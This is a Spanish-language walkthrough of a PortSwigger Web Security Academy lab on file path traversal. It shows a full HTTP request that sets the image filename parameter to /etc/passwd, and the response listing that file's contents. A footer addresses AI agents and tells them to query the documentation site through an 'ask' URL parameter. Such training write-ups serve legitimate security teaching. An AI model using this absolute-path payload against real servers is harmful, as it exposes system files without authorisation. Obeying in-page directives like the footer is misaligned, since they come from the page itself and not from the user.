# Lab 2: File path traversal, traversal sequences blocked with absolute path bypass Analizamos el codigo de la aplicacion HTML y encontramos lo siguiente: {% code overflow="wrap" %} ``` https://0a6a00de035c123e82e72e2d00f5002f.web-security-academy.net/image?filename=8.jpg ``` {% endcode %} Teniendo en cuenta lo anterior, se procede a cambiar el valor del parametro de filename. La peticion quedaria asi: ``` GET /image?filename=/etc/passwd HTTP/2 Host: 0a6a00de035c123e82e72e2d00f5002f.web-security-academy.net Cookie: session=N7gYKQa84EhdQrulvkDbr5jMnswePjVd Pragma: no-cache Cache-Control: no-cache Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.9 Priority: u=0, i Connection: keep-alive ``` Y la respuesta obtenida fue: ``` HTTP/2 200 OK Content-Type: image/jpeg X-Frame-Options: SAMEORIGIN Content-Length: 2316 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin peter:x:12001:12001::/home/peter:/bin/bash carlos:x:12002:12002::/home/carlos:/bin/bash user:x:12000:12000::/home/user:/bin/bash elmer:x:12099:12099::/home/elmer:/bin/bash academy:x:10000:10000::/academy:/bin/bash messagebus:x:101:101::/nonexistent:/usr/sbin/nologin dnsmasq:x:102:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin systemd-timesync:x:103:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:104:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:105:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin mysql:x:106:107:MySQL Server,,,:/nonexistent:/bin/false postgres:x:107:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin rtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologin mongodb:x:110:117::/var/lib/mongodb:/usr/sbin/nologin avahi:x:111:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin cups-pk-helper:x:112:119:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin geoclue:x:113:120::/var/lib/geoclue:/usr/sbin/nologin saned:x:114:122::/var/lib/saned:/usr/sbin/nologin colord:x:115:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin pulse:x:116:124:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin gdm:x:117:126:Gnome Display Manager:/var/lib/gdm3:/bin/false ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://books.spartan-cybersec.com/web/path-traversal/lab-2-file-path-traversal-traversal-sequences-blocked-with-absolute-path-bypass.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.